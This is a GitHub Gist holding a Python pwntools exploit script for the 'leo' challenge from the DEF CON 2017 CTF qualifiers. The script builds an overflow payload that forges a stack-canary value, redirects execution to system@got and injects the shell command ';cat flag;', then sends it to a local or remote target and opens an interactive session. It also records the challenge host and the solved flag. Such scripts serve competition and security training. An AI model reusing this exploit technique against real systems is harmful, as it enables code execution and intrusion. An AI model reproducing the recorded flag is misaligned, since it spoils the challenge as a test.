Last active
May 10, 2017 00:49
-
-
Save hugsy/af54cfb1208398286b2bf062428f7c04 to your computer and use it in GitHub Desktop.
leo - defcon 2017
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # | |
| # leo - defcon 2017 | |
| # | |
| # Leo es Pequeno | |
| # You boys like Mexico?! | |
| # leo_33e299c29ed3f0113f3955a4c6b08500.quals.shallweplayaga.me 61111 | |
| # | |
| # The flag is: 2c641a4386ec64280ca77d1beae6d372 | |
| # | |
| # @_hugsy_ | |
| from pwn import * | |
| context.update(arch="amd64", | |
| #log_level="debug", | |
| terminal=["tmux", "split-window", "-v", "-p 85"],) | |
| LOCAL, REMOTE, SSH = False, False, False | |
| TARGET=os.path.realpath("./leo") | |
| elf = ELF(TARGET) | |
| url = "http://leo_33e299c29ed3f0113f3955a4c6b08500.quals.shallweplayaga.me" | |
| def attach(r): | |
| if LOCAL: | |
| bkps = [ | |
| #0x000000004013CF, | |
| #0x00004019BA, | |
| #0x0000000401ADA, | |
| #0x00401ACA, | |
| #0x0401A9B, | |
| #0x401BC1, | |
| ] | |
| cmds = [ | |
| "set follow-fork-mode parent", | |
| "c", | |
| ] | |
| gdb.attach(r, '\n'.join(["break *{:#x}".format(x) for x in bkps] + cmds)) | |
| return | |
| def exploit(r): | |
| def nb_occur(data): | |
| cnts = [0 for _ in range(256)] | |
| for c in data: cnts[ ord(c) ] += 1 | |
| return cnts | |
| attach(r) | |
| SZ = 16000 | |
| constraint = (SZ >> 8) * 10 | |
| buf = "" | |
| buf += "A"*24 | |
| # stack canary | |
| buf += p32((((SZ >> 0x1f) + SZ) >> 1) + 1) | |
| buf += p8((24 + 3) + 8 + 4) # this is the index.... lets just insert a value to skip over this value | |
| buf += "C" * (3 + 8) # for the rest of "index" field (not copied) | |
| buf += p64(0x00400FD0) # system@got | |
| # no occurence must be 0 | |
| buf+= ''.join([chr(_) for _ in range(256)]) | |
| # padding to align to the stack frame | |
| buf += "A" * 256 | |
| buf += "B" * (256 + 96) | |
| buf += ";cat flag;\0" | |
| # at least one char must be corresponding to `constraint` so we pad the rest to reach SZ size | |
| cnts = nb_occur(buf) | |
| for i in range(256): | |
| count = constraint - cnts[i] | |
| if count > SZ - len(buf): | |
| count = SZ - len(buf) | |
| buf += p8(i) * count | |
| if len(buf) >= SZ: | |
| break | |
| r.send( buf ) | |
| r.interactive() | |
| return | |
| if __name__ == "__main__": | |
| if len(sys.argv)==3: | |
| REMOTE=True | |
| HOST, PORT = sys.argv[1], int(sys.argv[2]) | |
| r = remote(HOST, PORT) | |
| log.info("Starting '{}' remotely".format(TARGET)) | |
| else: | |
| LOCAL=True | |
| r = process([TARGET, ]) | |
| log.info("Starting '{}' locally".format(TARGET)) | |
| exploit(r) | |
| sys.exit(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment